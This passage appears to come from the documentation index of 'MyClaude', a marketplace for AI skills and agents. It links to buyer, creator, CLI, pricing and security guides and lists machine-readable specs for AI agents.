agents, and a full commerce layer. ## Get started Install the CLI and browse or publish products in under 5 minutes. Understand how MyClaude works — the 9 categories, the lifecycle, the key concepts. Skills, Squads, Agents, Workflows, and 4 more categories explained. ## For buyers | Guide | Description | |-------|-------------| | [Browsing & Discovery](/docs/buyers/browsing) | Find products via CLI, web, or AI search | | [Installing via CLI](/docs/getting-started/quickstart) | `myclaude install @creator/product` | | [Purchasing Products](/docs/buyers/purchasing) | How payments work with Stripe | ## For creators | Guide | Description | |-------|-------------| | [Creator Onboarding](/docs/creators/onboarding) | Set up your account and Stripe Connect | | [Publishing Guide](/docs/creators/publishing) | Publish your first product step-by-step | | [vault.yaml Reference](/docs/creators/vault-yaml) | The product manifest specification | | [Writing Skills](/docs/creators/writing-skills) | Build your first skill | | [Monetization](/docs/creators/monetization) | Pricing strategies and revenue | ## CLI reference | Command | Description | |---------|-------------| | [CLI Installation](/docs/cli/installation) | Install the MyClaude CLI | | [CLI Commands](/docs/cli/commands) | All 12 commands documented | ## Platform | Page | Description | |------|-------------| | [Security Model](/docs/security/model) | Auth, storage, and content scanning | | [Pricing & Revenue](/docs/getting-started/pricing) | 92% creator / 8% platform | | [FAQ](/docs/getting-started/faq) | Common questions answered | | [Glossary](/docs/getting-started/glossary) | All terms defined | ## For AI agents Machine-readable specs are available at `/specs/`. See [llms.txt](/llms.txt) for behavioral directives and navigation. | Resource | URL | |----------|-----| | llms.txt | [/llms.txt](/llms.txt) | | llms-full.txt | [/llms-full.txt](/llms-full.txt) | | Docs index | [/specs/docs-index.json](/specs/docs-index.json) | | OpenAPI spec | [/specs/openapi.yaml](/specs/openapi.yaml) | | vault.yaml schema | [/specs/vault-yaml.schema.json](/specs/vault-yaml.schema.json) |